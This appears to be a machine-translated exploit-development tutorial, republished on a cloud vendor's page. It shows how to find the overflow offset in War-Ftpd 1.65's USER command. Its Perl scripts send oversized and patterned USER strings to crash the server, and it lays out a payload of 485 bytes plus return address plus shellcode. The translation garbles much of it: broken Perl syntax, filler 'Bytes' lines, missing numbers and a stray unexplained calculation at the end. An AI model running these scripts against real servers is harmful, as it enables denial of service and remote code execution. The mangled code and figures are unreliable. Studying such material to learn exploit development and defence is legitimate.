Two methods to locate hejian overflow points

Source: Internet
Author: User
Tags ftp login

 

Author: SuperHei
Nature of the article: original
Release date:

Vulnerability software: War-Ftpd version 1.65
Debugging software: Ollydbg
Programming: perl

Vulnerability Description: Creates a USER, causing stack overflow.
For some debugging problems, please refer to: Win32 Buffer Overflow practice http://www.ph4nt0m.org/doc/20041101160955.pdf

We first simulate ftp login and write a script, and use AAAA to submit the user ..... indicates the number of times submitted using parameters. The overflow point we want to determine is the AAA ..... the number of our ret records that have just been overwritten.

#! /Usr/bin/perl
Use IO: Socket;

$ ARGC = @ ARGV;
$ Host = "127.0.0.1 ";
$ Port = "2121 ";
$ Eff = @ ARGV [0];
$ Buff = 'A' x $ eff;

My $ sock = IO: Socket: INET-> new (Proto => "tcp ",
PeerAddr => $ host,
PeerPort => $ port) | die "Sorry! Cocould not connect to $ host \ n ";
Print $ sock "USER $ buff \ n ";
Print "USER $ buff \ n ";
Close $ sock;

Next we use a 2-way method to determine this $ eff. First, we use ollydbg to load our War-Ftpd and run it.
We run the pl
C: \ usr \ bin> exp. pl 800
USER AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Aaaaa

When we submit 800 A requests, overflow is triggered, and war-ftpd fails. The EIP value is 41414141.

Here we re-use the olldbg for debugging once, this time we submit 400:
C: \ USR \ bin> exp. pl 400
User aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Bytes
Bytes
Bytes
Bytes
AAAAA

The vulnerability was not triggered at all, indicating that our ret was not overwritten by the AAAA we submitted. We can confirm
The value of $ eff is between and.

We are testing 550 A vulnerabilities, and the vulnerability is triggered again. Then we confirm that the value of $ eff is between and.
....................

Finally, when we submit 489 A records, the last 4 A records overwrite our return address (ret) ollydbg.
The eip of is exactly overwritten by 41414141, so we are sure that the overflow is reached :). That is, we can preliminarily determine the characters submitted by exp:
User aaaa... (485) + RET + ShellCode
Next, we need to confirm the shellcode address. We can see that our shellcode can be found near esp through debugging.
Then we can use the jump exp (or call esp) Address to overwrite RET, so our jump will be completed ...............
In fact, we have completed a small part of exp, mainly including the compilation and debugging of shellcode.
I am not familiar with it yet. I am trying to work hard at ing :).

B. Use two overflows to locate overflow points

This method was first seen on Anti-DDoS. The example is the last user vulnerability in War-Ftpd version 1.65.

1st Overflow Code:

#! /Usr/bin/perl
Use IO: Socket;

$ Host = "127.0.0.1 ";
$ Port = "2121 ";

My $ sock = IO: Socket: INET-> new (Proto => "tcp ",
PeerAddr => $ host,
PeerPort => $ port) | die "Sorry! Cocould not connect to $ host \ n ";
Print $ sock "USER ";
# Key code
For ($ I = 0; I I <800; $ I ++ ){
$ K = $ I % 10 + 100; # <= pay attention to this
Print $ sock chr ($ k );

Print chr ($ k );}
Print $ sock "\ n ";
Close $ sock;

Load War-Ftpd with ollydbg and run it.
C: \ usr \ bin> buff1.pl
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes

We can see that we submitted a 10-digit letter between 100-109 and d-m to determine the ending number.
The overflow is triggered. At this time, the eip 0x6C6B6A69 corresponds to the lkji machine code arrangement, which exists in reverse order.
Therefore, the first ret address we cover is I, and the machine code is 0x69. The letter "d-m" with no segments starts with "d ".
The corresponding machine code is 0x64. We can determine that the end number of the submitted buff length is 0x69-0x64 = 5.
Cover ret.

2nd Overflow Code:

#! /Usr/bin/perl
Use IO: Socket;

$ Host = "127.0.0.1 ";
$ Port = "2121 ";

My $ sock = IO: Socket: INET-> new (Proto => "tcp ",
PeerAddr => $ host,
PeerPort => $ port) | die "Sorry! Cocould not connect to $ host \ n ";
Print $ sock "USER ";
# Key code
For ($ I = 0; I I <800; $ I ++ ){
$ K = $ I/10 + 100; # <= pay attention to this
Print $ sock chr ($ k );

Print chr ($ k );}
Print $ sock "\ n ";
Close $ sock;

Use ollydbg to reload War-Ftpd and run it.
C: \ usr \ bin> buff1.pl
Bytes
Bytes
Detail {{{{{{{{{{
| | }}}}}}}}}}~~~~~~~~~~?????????? When there are too many threads, there are too many threads, too many threads
Please refer to the following link for more information:
Please refer to the following link for more information:
Please refer to the following link for more information:
Please refer to the following link for more information #####
Please refer to the following link for more information:
Saddle-North

At this time, the eip is 0x94949494, which is used to determine the overflow in that segment: 0x94-0x64 = 48

Based on the above two overflows, the overflow point is: (0x94-0x64) x10 + (0x69-0x64) = 485, that is, when we submit a 485
The buff starts to overwrite ret. 6e-64x100 + 80-64 = 1122

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.